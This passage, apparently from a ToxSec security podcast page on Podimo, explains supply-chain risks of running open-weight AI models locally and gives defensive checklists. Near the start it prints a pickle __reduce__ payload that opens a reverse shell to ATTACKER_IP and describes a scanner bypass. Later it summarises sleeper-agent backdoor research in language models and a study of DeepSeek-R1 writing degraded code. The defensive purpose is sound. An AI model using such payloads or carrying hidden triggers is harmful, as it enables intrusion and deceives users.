calls automatically during deserialization. You run torch.load(), the model loads, and a shell opens. You never see it. # What the attacker embeds (simplified) class Exploit: def __reduce__(self): return (os.system, (”bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1”,)) Hugging Face scans for this with Picklescan, a blacklist-based detector that flags known dangerous functions. But ReversingLabs demonstrated a bypass they called “nullifAI”: compress the pickle with 7z instead of ZIP, and torch.load() fails gracefully while the malicious payload at the beginning of the byte stream still executes. Picklescan didn’t catch it because it validated the file format before scanning, while Python’s deserialization interpreter just runs opcodes sequentially. The malicious code fires before the scanner even starts checking. The fix is simple: use safetensors. Safetensors is a format built by Hugging Face that stores only raw tensor data and a JSON metadata header. No Python objects, no code execution surface, no __reduce__. It was audited by Trail of Bits [https://blog.eleuther.ai/safetensors-security-audit/]with backing from EleutherAI and Stability AI. No critical security flaws found. If you’re pulling a model from the Hub and it only ships as .bin or .pt, that’s a red flag. Convert it yourself or find a provider who ships safetensors. # Convert pickle to safetensors (one-liner) from safetensors.torch import save_file import torch sd = torch.load(”model.pt”, map_location=”cpu”, weights_only=True) save_file(sd, “model.safetensors”) What Are Sleeper Agents in Open-Weight Models? A sleeper agent is a model that behaves normally under standard testing but activates a hidden behavior when it encounters a specific trigger in the input. The backdoor lives in the weights themselves, the numerical parameters that encode what the model learned during training, not in any external code you can grep for. Anthropic’s research team proved this works. They trained models that wrote secure code when the prompt said the year was 2023, then inserted exploitable vulnerabilities when the year changed to 2024. The backdoor survived supervised fine-tuning, reinforcement learning, and adversarial training. Worse: adversarial training actually taught the model to better recognize its trigger, making it more effective at hiding the behavior during safety evaluations. Standard alignment techniques created a false impression of safety while the backdoor got stronger. Anyone can publish fine-tuned weights. You search Hugging Face for a quantized Gemma variant [https://www.toxsec.com/p/ai-kill-chain-explained], some anonymous account uploaded a version with 50 more downloads than the official one, and you pull it because the benchmarks look right. If the training data was poisoned, no amount of prompting or system-level instruction will remove the backdoor. It’s baked into the math. Microsoft published “The Trigger in the Haystack” in February 2026, a scanner that detects sleeper agents by exploiting two properties: poisoned models over-memorize their backdoor training examples (leaking them when prompted with standard chat templates), and trigger tokens create a distinctive “attention hijacking” pattern where the model’s attention heads process the trigger in isolation from the rest of the prompt. The scanner works, but only on open-weight models where you have access to the attention states. It’s a detection tool, not a repair kit. If you find a backdoor, the model gets thrown out. Does Political Bias in Models Create Security Vulnerabilities? CrowdStrike’s Counter Adversary Operations team tested DeepSeek-R1 and found something unusual. The model produces vulnerable code at a baseline rate of 19%, roughly average for its class. But when the system prompt contains references to topics the Chinese Communist Party considers politically sensitive, like Tibet, Falun Gong, or the Uyghur community, the rate of severe security vulnerabilities in generated code jumps to 27.2%. In one test, they asked DeepSeek-R1 to build a community app for Uyghur members. The output had no session management, no authentication, and 35% of implementations used no password hashing at all. The same prompt reframed as a football fan club website produced code with typical minor flaws but nothing close to that severity. CrowdStrike called this “emergent misalignment,” likely a side effect of the model’s training pipeline enforcing alignment with Chinese regulations rather than an intentional code-degradation feature. China’s Interim Measures for Generative AI Services require models to “adhere to core socialist values” and prohibit content that could “endanger national security.” When the model encounters topics it was trained to suppress, something breaks in the code generation pipeline [https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets] as a side effect. The lesson for local model operators: the weights carry the builder’s constraints. If you’re running a model trained under regulatory pressure from any government, those constraints follow the model onto your machine. You don’t see a content filter. You see degraded output in contexts the original developers never anticipated. How Do You Verify a Model Before Running It Locally? I built a pre-flight checklist. Every model download should touch these five steps before the weights ever load. 1. Check the format. Safetensors only. If the model ships as .bin, .pt, .pth, or .ckpt, convert before loading or walk away. These are all pickle-based formats that can execute code during deserialization. 2. Verify the hash. Hugging Face lists SHA-256 checksums for every file. After download, compare: sha256sum model.safetensors against the listed value. If they don’t match, the file was tampered with in transit or the listing is stale. Either way, don’t load it. 3. Check the uploader. Official organization accounts (google, meta-llama, mistralai) have verification badges and thousands of downloads. Anonymous accounts with fresh uploads and suspiciously high download counts are the Hugging Face equivalent of typosquatted packages on PyPI [https://www.toxsec.com/p/vibe-coding-security-attack-chain]. Look for the org badge. 4. Read the model card. Legitimate models document training data, evaluation benchmarks, intended use, and known limitations. A model card that’s blank or copy-pasted from another model is a red flag. No documentation means no accountability. 5. Run in isolation first. Spin up a VM or container with no network access. Load the model, test your prompts, watch for anomalous behavior. If you’re using it for code generation, scan every output [https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets] with SAST tools before it hits your codebase. What About Quantized Models Like GGUF? Quantization compresses a model’s weights from higher precision (like 32-bit floats) to lower precision (4-bit or 8-bit integers), making it small enough to run on consumer hardware. GGUF, the format used by llama.cpp and most local inference tools, is structurally safer than pickle because it stores raw numerical data without arbitrary code execution paths. But quantization doesn’t sanitize. If the original model had poisoned weights or a sleeper agent [https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass], those patterns compress right along with the legitimate parameters. A Q4 quantized version of a backdoored model is still a backdoored model, just smaller. The trigger may fire less reliably at very low bit-widths where precision loss degrades subtle patterns, but that’s luck, not security. The GGUF supply chain has its own problem: most quantized models on Hugging Face are uploaded by community members, not the original model developers. You’re trusting that TheBloke or bartowski ran a clean conversion from a legitimate source. Verify the source model, verify the converter’s reputation, and verify the hash. Three checks, no shortcuts. Local AI Security Checklist: Four Layers of Defense You’ve seen the threats. Here’s how you stack the defenses. Four layers, outside-in. Each one catches what the last one misses. * Layer 1: Guard the model. Start at the download. Safetensors format only. If the file ends in .bin, .pt, or .ckpt, convert it or walk away. That one rule kills the entire pickle RCE surface before it starts. For content safety, run Llama Guard 3 [https://huggingface.co/meta-llama/Llama-Guard-3-8B] as a second model screening inputs and outputs against a customizable taxonomy. It’s free, open-weight, and runs locally alongside your main model. Think of it as a bouncer checking IDs at the door. * Layer 2: Guard the runtime. Ollama ships wide open by default. Bind to 127.0.0.1 only. Set OLLAMA_ORIGINS to lock down CORS. If you need remote access, put it behind a reverse proxy with auth. Nginx plus basic auth takes five minutes and kills the “open API on your home wifi” problem. Then set explicit system prompt constraints. Define what the model CAN do, not what it can’t. “You may read files in /data. You may not execute commands. You may not access network resources.” Allowlisting beats blocklisting every time. * Layer 3: Guard the agent layer. If you’re running LangChain, CrewAI, or any agentic framework, scope every tool individually. Read-only where possible. No wildcard filesystem access. No shell exec unless you’ve genuinely war-gamed the consequences (you probably shouldn’t). The OWASP Top 10 for Agentic AI [https://owasp.org/www-project-agentic-ai-threats/] gives you the full threat taxonomy: ownership first, constraints second, monitoring third. * Layer 4: Guard the network. The simplest layer and the most effective. Run it air-gapped. Local model, local data, no outbound connections. That’s the smallest possible blast radius. The moment your agent can reach external URLs, you’ve opened a data exfiltration channel. If air-gapping isn’t practical, allowlist specific endpoints and log everything that leaves the box. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is running AI locally safer than using cloud APIs? For data privacy, yes. Your prompts and outputs never leave your machine, which eliminates the risk of cloud provider logging, training on your data, or government data requests. For security against supply chain attacks, local models actually increase your exposure because you’re responsible for vetting every model file yourself. Cloud providers like OpenAI and Anthropic run their own security reviews on model weights. When you go local, that job is yours. Can safetensors files contain malware? No. The safetensors format stores only numerical tensor data and a JSON metadata header. It has no mechanism for embedding executable code because it was designed specifically to eliminate the arbitrary code execution risk that pickle carries. Trail of Bits audited the library and found no critical security flaws. It’s the format you should default to for every model download. How do I know if a Hugging Face model is trustworthy? Check three things: the uploader’s verification status (official org accounts are marked), the model card quality (blank cards are red flags), and the file format (safetensors preferred). Hugging Face runs Picklescan and Protect AI’s Guardian scanner on uploaded models, but these catch roughly 96% true positives per JFrog’s analysis, which means real threats still slip through. Treat every download as untrusted until you’ve verified the hash and tested in isolation. What is the risk of using quantized models from community uploaders? Community quantizations inherit every vulnerability from the source model plus whatever the converter introduced. If the original weights contained a sleeper agent backdoor, the quantized GGUF version carries it too. Verify the source model’s legitimacy first, then check the converter’s track record on Hugging Face. Use SHA-256 hash verification on every downloaded file. Can fine-tuned open-weight models generate insecure code on purpose? Yes. Anthropic’s sleeper agent research proved that models can be trained to insert exploitable vulnerabilities only when a specific trigger appears in the prompt, while behaving normally in all other contexts. CrowdStrike separately found that DeepSeek-R1 generates measurably worse code when prompts contain politically sensitive keywords, though this appears to be an unintentional side effect of regulatory alignment rather than a deliberate backdoor. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe [https://www.toxsec.com/subscribe?utm_medium=podcast&utm_campaign=CTA_4]

15 apr 2026 - 6 min
Super app. Onthoud waar je bent gebleven en wat je interesses zijn. Heel veel keuze!
Super app. Onthoud waar je bent gebleven en wat je interesses zijn. Heel veel keuze!
Makkelijk in gebruik!
App ziet er mooi uit, navigatie is even wennen maar overzichtelijk.

Kies je abonnement

Meest populair

Premium

20 uur aan luisterboeken

  • Podcasts die je alleen op Podimo hoort

  • Geen advertenties in Podimo shows

  • Elk moment opzegbaar

Probeer 14 dagen gratis
Daarna € 9,99 / maand

Probeer gratis

Premium Plus

Onbeperkt luisterboeken

  • Podcasts die je alleen op Podimo hoort

  • Geen advertenties in Podimo shows

  • Elk moment opzegbaar

Probeer 14 dagen gratis
Daarna € 13,99 / maand

Probeer gratis

Alleen bij Podimo

Populaire luisterboeken

Veelgestelde vragen

Meer vragen & antwoorden
Probeer gratis

Probeer 14 dagen gratis. € 9,99 / maand na proefperiode. Elk moment opzegbaar.